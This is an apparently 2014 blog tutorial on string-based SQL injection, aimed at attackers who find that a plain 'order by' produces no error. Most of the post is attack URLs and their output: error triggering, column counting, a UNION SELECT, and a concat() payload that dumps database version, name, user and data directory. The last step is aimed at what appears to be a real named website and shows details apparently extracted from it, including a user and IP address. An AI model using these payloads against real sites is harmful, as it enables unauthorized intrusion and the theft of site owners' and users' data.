Thursday, 29 May 2014

ORDER BY DOES NOT WORK ?


Lets get it on.


I have no knowledge in SQL Injection, is this tutorial usefull?
No, I suggest you read up some tutorials on Union based SQL Injection before attempting this technique.

When should I read/use this tutorial?

You should use this tutorial when you are stuck at the 'order by' command that is giving you NO error.

Problem: You have a site which gives your a SQL Error but when performing "order by" You don't get any errors.

Then you are probably going to have to use 'string based Injection'.

Here is how this works.

1.
We try this site:
Code:
http://www.target.co.uk/products.php?id=6'

Which gives us the Error:

Code:
There was an error, please try again later. Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6'' ORDER BY orderID LIMIT 0, 3' at line 1

2.

Now we know it's vulnerable and moving over the the 'order by' command.

Code:
http://www.target.co.uk/products.php?id=6 order by 1--
This gives us a normal page

3.
We now try a large number with the 'order by', like this:

Code:
http://www.target.co.uk/products.php?id=6 order by 1000--
Hmm, still no error.

4.
We will now make some changes in the syntax.
We will put a ' after 6 and a +- after the hyphens (--).

Our syntax would now look like this:

Code:
http://www.target.co.uk/products.php?id=6' order by 1--+

This code gives ur no error, which is good.
5.
Now we try the same syntax, but with larger number:
Code:
http://www.target.co.uk/products.php?id=6' order by 1000--+

Finaly, this gives us this error:

Code:
There was an error, please try again later. Error: Unknown column '1000' in 'order clause'

6.
Now, we would like to find the column count, just like in union based, we try something like:

Code:
http://www.target.co.uk/products.php?id=6' order by 13--+

No error, which means the column count is higher than 13 (you know the deal).


7.
Now we try:

Code:
http://www.target.co.uk/products.php?id=6' order by 14--+

Which gives ur error:

Code:
There was an error, please try again later. Error: Unknown column '14' in 'order clause'

8.
Now the injection works just like in 'union based'.

Code:
http://www.target.co.uk/products.php?id=-6' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+

The output is:

Code:
There was an error, please try again later.
2
6
Read More...

4

Page 1     1 |



9.
Now, you hack it.
Code:
http://www.matrixinnovations.co.uk/products.php?id=-6' union select 1,concat(version(),0x3a,database(),0x3a,user(),0x3a,@@datadir),3,4,5,6,7,8,9,10,​11,12,13--+

Output:
Code:
There was an error, please try again later.
5.1.56-community-log:web183-newmatrix:web183-newmatrix@79.170.40.183:/var/lib/mysql/
6
Read More...

I hope you liked my tutorial, if you have any questions feel free to post.

Happy hacking.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)